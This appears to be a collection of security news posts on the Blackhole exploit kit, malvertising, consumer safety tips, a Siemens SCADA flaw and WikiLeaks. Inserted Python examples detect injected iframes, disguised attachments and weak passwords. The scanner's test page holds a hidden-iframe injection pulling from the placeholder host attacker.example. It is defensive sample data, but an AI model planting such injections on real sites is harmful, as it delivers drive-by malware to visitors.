Falling Into The Black Hole

An Old Hack Technique Gets A New Twist

Doug Bernard | Washington DC

Hackers may not always be the most innovative group. But as a rule, they are sneaky.

That’s exactly how the latest hack target, Cryptome.org, summed up the recent hit on its website: “sneaky.”

One version of a black hole (Creative Commons: Gallery of Space Time Travel)

A well known anti-secrecy site, Cryptome tends more to be a repository of information that others have obtained using various computer hacks, rather than the victim of a hack itself. But this week thousands of visitors who thought they were visiting the Cryptome website instead found themselves redirected to malicious websites. At the root of the attack is a rapidly growing technique that some are calling “malvertising.”

It works like this. An attacker crafts a legitimate-looking ad with malicious code hidden inside it and submits it to one of the large online advertising networks, which then distribute the harmless-looking ad to the websites they serve. The hidden code is typically a script or an invisible frame that quietly pulls in a page from a server the attacker controls, so neither the ad network nor the website hosting the ad needs to be compromised. When a visitor clicks on the bad ad, the attack launches and their computer is compromised.

In and of itself, this is hardly a new technique. However, the Cryptome attack is just the most recent in a growing string of attacks using something called the Blackhole Exploit Kit. This can get a little geeky, so we’ll try to keep it basic.

Created by Russian hackers, Blackhole is essentially a bag of bad computer code: a bundle of exploits, each aimed at a known vulnerability in a visitor’s web browser or the software it runs, such as Java, Adobe Reader and Flash Player, rather than the operating system itself. A recent report from M86 Security notes the Blackhole Exploit Kit has become the tool of choice for many hackers, in part because of its “capability to update frequently and rapidly to take advantage of application vulnerabilities.” Driving the point home, a Sophos Corporation analysis of 2012 Internet security trends says these redirect ploys account for 67% of the attacks it tracked, with Blackhole accounting for a full 31% all by itself.

What was new in the Cryptome hack was what security analysts are calling “drive-by” technology. In other words, a visitor to a website carrying an infected Blackhole ad no longer has to click on the ad; just viewing the page can be enough to inject malware onto your computer. The ad loads an invisible frame or script that silently fetches the kit’s landing page; that page checks which browser and plug-in versions the visitor is running and serves an exploit matched to whatever out-of-date version it finds. Additionally, as Fahmida Rashid of eWeek.com reports, the Cryptome attack “specifically avoided targeting IP addresses from Google to prevent the search engine from blacklisting the site.” Meaning users were unlikely to know they were under attack until it was too late, and the malicious code was built to stay out of sight of the world’s largest search engine, whose crawlers would otherwise have flagged the site and warned visitors away from it.
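Here is an added example, not part of the original post, of the check an administrator can run on a page’s HTML to catch the injection pattern that Blackhole-style drive-by attacks relied on: an off-site frame sized or styled to be invisible, or a script pulled from a foreign domain. The sample pages and the host name attacker.example are constructed for the demonstration; the domain is a placeholder, not a real indicator of compromise. (When the payload arrives inside an ad, the same frame sits in the ad’s HTML rather than the page’s own, but the tell is identical.)

```python
"""Added example: spot the hidden-iframe / off-site script injection that
Blackhole-style drive-by attacks used. Sample pages are constructed for this
demo; attacker.example is a placeholder, not a real indicator."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    """Collects (kind, src) findings for frames and scripts that pull
    content from a host other than the page's own."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def _offsite(self, url):
        host = urlparse(url).hostname
        return bool(host) and host.lower() != self.page_host

    @staticmethod
    def _tiny(value):
        # "0", "1", "1px": a frame nobody is meant to see.
        try:
            return value is not None and int(value.lower().rstrip("px")) <= 1
        except ValueError:
            return False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lowercases attribute names
        if tag == "iframe":
            src = a.get("src", "")
            style = (a.get("style") or "").replace(" ", "").lower()
            concealed = (
                (self._tiny(a.get("width")) and self._tiny(a.get("height")))
                or "display:none" in style
                or "visibility:hidden" in style
            )
            if self._offsite(src) and concealed:
                self.findings.append(("hidden-iframe", src))
        elif tag == "script":
            src = a.get("src", "")
            # Off-site scripts are common on legitimate pages (ad networks,
            # analytics), so this is a lead to review, not a verdict.
            if src and self._offsite(src):
                self.findings.append(("offsite-script", src))


def scan(html, page_host):
    """Return the list of (kind, src) findings for one page."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><body><h1>Cryptome</h1>
<iframe src="https://cryptome.org/embed/viewer" width="600" height="400"></iframe>
</body></html>"""

INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://attacker.example/in.php" width="1" height="1" '
    'style="visibility: hidden"></iframe>\n</body>',
)

if __name__ == "__main__":
    print("clean:", scan(CLEAN_PAGE, "cryptome.org"))
    print("infected:", scan(INFECTED_PAGE, "cryptome.org"))
```

The scanner flags a frame only when it is both off-site and concealed, which keeps ordinary embedded content (the 600x400 frame on the clean page) out of the results; the off-site script finding is deliberately lower-confidence because legitimate ad and analytics code loads the same way.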

In a word: sneaky.

Cyber security analyst Brian Krebs has a good piece exploring how users of Blackhole malware profit from their misdeeds, while writers at the Imperva Corp’s “Security Blog” have a highly detailed dissection of Blackhole and how it works. Neither is light reading, so we’ll skip to the point: no matter how careful you are on the Internet, it’s becoming harder not to fall into a black hole.

Security in 60 Seconds

How to Fight Back Against Hackers and Protect Yourself on the Web

Over the last few months we’ve discussed just a few of the many surfacing stories regarding breaches of computer or Internet security.  Whether the threats are from organized crime, shadowy  hacker groups like Anonymous or LulzSec, or coming with the alleged assistance of foreign governments, it seems that  security online is at an all-time low.

That’s probably something of an overstatement.  Arguably it’s more likely the web was significantly less secure even a decade ago, before corporations and governments began taking cyber-security seriously.

Still, threats to our online privacy and security are growing – and growing more sophisticated.  So it’s more important, now than ever, to take what steps we can to protect ourselves.  Below, some (hopefully) helpful suggestions.

#1: Surf “Secure”:  You can be forgiven for not knowing much about the web’s security protocol, even though it’s probably right before your eyes.

You’ve no doubt seen that “http:” string in your web browser many times; it’s probably up there right now.  It stands for “Hypertext Transfer Protocol”, the set of rules your browser and a website follow to request and deliver pages.  Its secure variant, “https:”, has been supported by browsers like Internet Explorer and Firefox for years, though only recently have many major sites begun offering it for everyday browsing.

Without getting into the technical details, suffice it to say the “s” at the end of the string stands for “Secure”: the connection between your browser and the website is encrypted (using SSL/TLS), so anyone sitting between the two, on a coffee-shop Wi-Fi network for instance, sees scrambled traffic instead of your passwords and messages, and the site presents a certificate that lets your browser check it is really talking to the site named in the address bar.  Two caveats: “https:” protects the data in transit, not the site at the other end, so a malicious site can use it too; and it does nothing against malware already on your own machine, which sees everything you type.  While many websites do not support the secure format yet, an expanding number do.  One example is Facebook, which offers its users a setting to always use the “https:” secure connection.

In short: use it when you can, and when you can’t, remember that you might not be alone on the line.

#2: Just Say No:  That email a friend just sent you with the funny picture “you just have to see”, or the thumb drive someone gave you to transfer a file to your computer?  Be very careful before opening them.

One of the oldest and surest ways to spread a virus or bit of malware over the Internet is as a “document” given to you by a friend.  But don’t blame your friends – blame clever hackers.  For decades they’ve been hiding bad bugs in small executable files masquerading as documents, like text or pictures, sent via email and accompanied by come-on messages like “You’ve got to see this!” or something similar.  A favourite trick is a name like “photo.jpg.exe”: Windows hides the final extension by default, so the file shows up as “photo.jpg” with a picture icon.  Sent from a friend, it’s natural to think they’ve sent you something you’d like to see, but once you open the file, it launches the bug, which then often infects your computer, seizes all your email contacts, and sends out copies of itself to all your friends with the same come-on – often without you ever knowing.
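As an added example (not from the original post), here is the kind of check a practitioner makes on an unsolicited attachment before double-clicking it: does the file name carry a hidden executable extension, and do the file’s first bytes match the type the name claims? The header bytes and file names below are constructed for the demo; none of it is real malware.

```python
"""Added example: checks to run on an unsolicited attachment before opening
it. The byte strings below are constructed stand-ins (a few header bytes),
not real files or malware."""

# Leading bytes ("magic numbers") that identify common file types.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF8": "gif",
    b"%PDF": "pdf",
    b"MZ": "exe",          # Windows executable (.exe, .scr, .pif, .com ...)
    b"PK\x03\x04": "zip",  # also .docx/.jar containers
}
DOCUMENT_TYPES = {"jpeg", "jpg", "png", "gif", "txt", "doc", "pdf"}
EXECUTABLE_EXTENSIONS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "jar", "lnk"}


def sniff(data):
    """Name the file type from its first bytes, ignoring the file name."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def assess(filename, data):
    """Return the reasons an attachment looks like a disguised program
    (an empty list means nothing suspicious was found)."""
    reasons = []
    if "\u202e" in filename:
        # Right-to-left override: "photo\u202egpj.exe" is displayed as "photoexe.jpg".
        reasons.append("right-to-left override character in file name")

    exts = filename.lower().split(".")[1:]
    if exts and exts[-1] in EXECUTABLE_EXTENSIONS:
        reasons.append("executable extension ." + exts[-1])
        if len(exts) >= 2 and exts[-2] in DOCUMENT_TYPES:
            reasons.append("double extension (Windows hides the last one by default)")

    claimed = exts[-1] if exts else ""
    claimed = "jpeg" if claimed == "jpg" else claimed
    if sniff(data) == "exe" and claimed != "exe":
        reasons.append("content is a Windows executable but the name claims "
                       + (claimed or "no type"))
    return reasons


# Constructed header bytes: a JPEG (JFIF) header and a DOS/Windows "MZ" stub.
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
EXE_BYTES = b"MZ\x90\x00\x03\x00\x00\x00"

if __name__ == "__main__":
    for name, blob in [("kitten.jpg", JPEG_BYTES),
                       ("kitten.jpg.exe", EXE_BYTES),
                       ("kitten.jpg", EXE_BYTES),
                       ("photo\u202egpj.exe", EXE_BYTES)]:
        print(repr(name), "->", assess(name, blob) or "looks as labelled")
```

The content check matters more than the name check: a mail client or a renaming user can strip or hide extensions, but an executable still starts with the two bytes “MZ”.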

As a general rule, if someone sends you something you haven’t asked for, even a friend, think twice about opening it.  If you have any suspicions, drop your friend a note asking what they sent; if they don’t know what you’re talking about, delete the message immediately.  As for flash drives, viruses can just as easily hide there; on older versions of Windows the AutoRun feature could launch a program the moment you inserted the drive, and on any system a disguised file is one double-click away.  Like before, when you open the drive, don’t open (or double-click on) anything you don’t specifically want.  And as for those hidden bugs you can’t even see…

#3: “Auntie Knows Best”: Auntie, in this case, being anti-virus.

You can only do so much to keep your computer safe and free of malware; many of the more modern viruses are fairly sophisticated and engineered to hide in the deepest corners of your computer.  To fight back, you need something just as technologically sophisticated, and that’s an anti-virus.

Just like their biological counterparts, anti-virus programs are designed to protect you against a new infection.  Unlike a vaccine, however, they also sweep your computer for older infections, and they update themselves regularly, responding to new threats floating around the web.  They are not foolproof: a scanner mostly recognises malware it has seen before, and the exploit kits described above lean on out-of-date software, so keeping your operating system, browser and plug-ins such as Java, Adobe Reader and Flash patched matters at least as much as the scanner itself.

Some anti-virus programs cost money; others are free.  Paid products often bundle extra features and support, but a free program from a reputable vendor will catch the same mainstream threats.  Any legitimate anti-virus program is better than none; without one it’s nearly certain your computer will eventually become infected, if it hasn’t already.

The CNET blog provides a good list of free programs to download; if you’re interested in something a little more robust and can afford a few dollars, shop around online for the best anti-virus package.

#4: No Pass Given: It’s the bane of digital life – the password.  Whether logging in online or dialing up a friend on your mobile, it’s likely your device first wants you to enter a password or code of some sort.  These codes are designed to make sure that you and only you have access to your personal equipment and accounts, so you would think people would take them more seriously.  In truth, many people regard these protections as little more than a bother – and those are the people most likely to get hacked.

Passwords vary greatly in complexity; some only want letters or digits while others demand a mix of upper and lower-case letters, numbers, and non-alphanumeric symbols such as # or &.  The longer and more varied the password, the harder it is for hackers to crack, because cracking is mostly a matter of guessing: a program tries dictionary words and common patterns first, then grinds through every combination of characters, and every extra character or character class multiplies the number of combinations it has to try.

Unfortunately, these complex strings are also harder to enter – or even remember.  Thus many people use the simplest codes they can, such as “password1” or “12345” or such.  While easy to enter, passwords like these are so easy to break they can hardly be called passwords – they might as well be called please-break-into-my-computer-words.

Good advice: choose a password that’s long and complex – use a mix of digits, letters and symbols.  Better advice: don’t use the same password for all your online activities – if someone cracks one of your accounts, they’ll try the same password on all the others.  Best advice: change your password immediately whenever a site you use reports a breach, and periodically otherwise; the old rule of thumb is every 30 days, though more recent guidance (NIST’s password rules, for one) puts more weight on length and uniqueness than on frequent rotation, since forced monthly changes push people toward predictable patterns.
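An added example, not from the original post, that turns the advice above into a check: a rough strength estimate that rejects dictionary passwords and their digit-suffixed variants, scores the rest by length and the character classes used, and a second function that flags a password reused across accounts. The common-password list and the account data are small constructed samples; a real check uses lists of millions of leaked passwords.

```python
"""Added example: a rough password-strength estimate plus a reuse check.
COMMON is a tiny constructed sample of a leaked-password list."""
import math
import string

COMMON = {"password", "12345", "123456", "qwerty", "letmein", "iloveyou", "abc123"}

# (character set, size of the pool an attacker must brute-force if it is used)
CLASSES = [
    (set(string.ascii_lowercase), 26),
    (set(string.ascii_uppercase), 26),
    (set(string.digits), 10),
    (set(string.punctuation), 32),
]


def strength(password):
    """Return (estimated bits, verdict).

    Bits assume a brute-force search over the character classes actually
    used, so they overestimate for phrases made of dictionary words; known
    passwords (and "password1"-style variants) score zero because an
    attacker tries those first."""
    lowered = password.lower()
    base = lowered.rstrip(string.digits + string.punctuation)
    if lowered in COMMON or base in COMMON:
        return 0.0, "reject"
    pool = sum(size for chars, size in CLASSES if any(c in chars for c in password))
    bits = round(len(password) * math.log2(max(pool, 1)), 1)
    if bits < 28:
        verdict = "weak"
    elif bits < 60:
        verdict = "fair"
    else:
        verdict = "strong"
    return bits, verdict


def reused(accounts):
    """accounts: {site: password}. Return groups of sites sharing a password."""
    by_password = {}
    for site, password in accounts.items():
        by_password.setdefault(password, []).append(site)
    return [sorted(sites) for sites in by_password.values() if len(sites) > 1]


# Constructed sample accounts (not real credentials).
SAMPLE_ACCOUNTS = {"mail": "Summer2012", "bank": "Tr0ub4dor&3", "forum": "Summer2012"}

if __name__ == "__main__":
    for pw in ["12345", "password1", "Summer2012", "Tr0ub4dor&3", "correct horse battery staple"]:
        print(repr(pw), "->", strength(pw))
    print("reused across:", reused(SAMPLE_ACCOUNTS))
```

The thresholds (28 and 60 bits) are conventional rules of thumb for online versus offline guessing; the interesting behaviour is that “Summer2012” lands at 59.5 bits despite mixing three character classes, while a long all-lowercase phrase sails past 100, which is the “length beats complexity” point the advice above makes.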

This is especially true for mobile devices.  A shockingly large percentage of people never bother to change the factory-set PIN on their voice mail, leaving it wide open to a “spoofing” attack (faking the caller ID of your own phone to get at your messages) so easy even children are doing it.  As we noted in our most recent post, a few mobile phone providers are now requiring individuals to enter their pass codes when checking voice mail, but there’s no requirement to change the pre-set codes.   Before making your first call on a new phone, change your pass code, and then keep changing it, ideally once a month.

#5: Encrypt, Encrypt, Encrypt: While the “https:” protocol provides good, basic protection for the contents of a connection, it does not hide which sites you visit or who you are.  That matters if you’re concerned about keeping your web activities private or want to hide your identity online.

For those, the solution is encryption combined with tools that hide your tracks.  We’ve discussed them here often before, but it’s worth repeating – a solid privacy tool such as Tor, Freegate or Psiphon (just to name a few) will help you cover your tracks on the Internet, shield your identity, and keep private conversations private.  Tor is an anonymity network that bounces your encrypted traffic through several volunteer relays so no single party sees both who you are and where you’re going; Freegate and Psiphon are circumvention proxies built mainly to get around government censorship.  None of them replaces the precautions above: an anonymised connection will carry a malicious download just as readily as a normal one, and none of these tools checks your passwords for you.

Of course these are only a few of the many steps you can take to protect yourself online, but they’re a solid start.  If you’re interested in learning more about cyber-security, the U.S. Computer Emergency Readiness Team (US-CERT) at the Department of Homeland Security has a good set of security tips worth exploring.


Fingers in the Dike

Did Washington Block Discussion of a Security Patch?  Should It Have?

Reports of cyber-attacks and security hacks have been filling the Net lately.  Sony’s PlayStation Network has suffered a very public series of crippling hacks that may have compromised the personal information of the network’s 100 million users, and cost the electronics giant over 14 billion yen (about $170 million).  South Korean officials announced they were stepping up Internet security barriers in the wake of what they say are accelerating attacks from the North.   And at the other end of the globe, Ireland has been struggling to fend off computer attacks intended to infect otherwise clean local servers with malware.

Now comes news of a potentially debilitating security hole in certain industrial control systems that could possibly lead to massive industrial espionage – or worse.

As first reported in Wired, the flaws affect the “SCADA” systems of various Siemens control devices, many of which can be found in very high-level industrial, processing and generating facilities around the world.  SCADA stands for “supervisory control and data acquisition”: systems that let operators both monitor and control a wide variety of physical processes.  Not surprisingly for a company valued at $80 billion, Siemens products can be found everywhere.  Nuclear plants, natural gas pipelines, waste-water treatment, chemical production: with a big enough security hole, all these and many other facilities are potentially at risk from hackers seeking to take control of the plant.

Drip, Drip, Drip…

How Wikileaks Exploits Technological, and Human, Weaknesses

Kate Woodsome |Washington DC

Founder of the WikiLeaks website, Julian Assange, at a recent press conference in London (Tom Turco - AP)

Historians, anti-war activists and armchair observers of human nature will have plenty to mull over in the coming years, thanks to the online group WikiLeaks.

The website has published hundreds of thousands of previously unreleased U.S. military and diplomatic documents, dating from February of this year to as far back as the 1960s.  The latest round of leaks, involving diplomatic cables, has renewed efforts by the U.S. government to tighten security on its computer systems.  But cyber-security experts point out the leaks were less a breakdown of technology than of trust.


What’s Digital Frontiers?

The Internet, mobile phones, tablet computers and other digital devices are transforming our lives in fundamental and often unpredictable ways. “Digital Frontiers” investigates how real world concepts like privacy, identity, security and freedom are evolving in the virtual world.
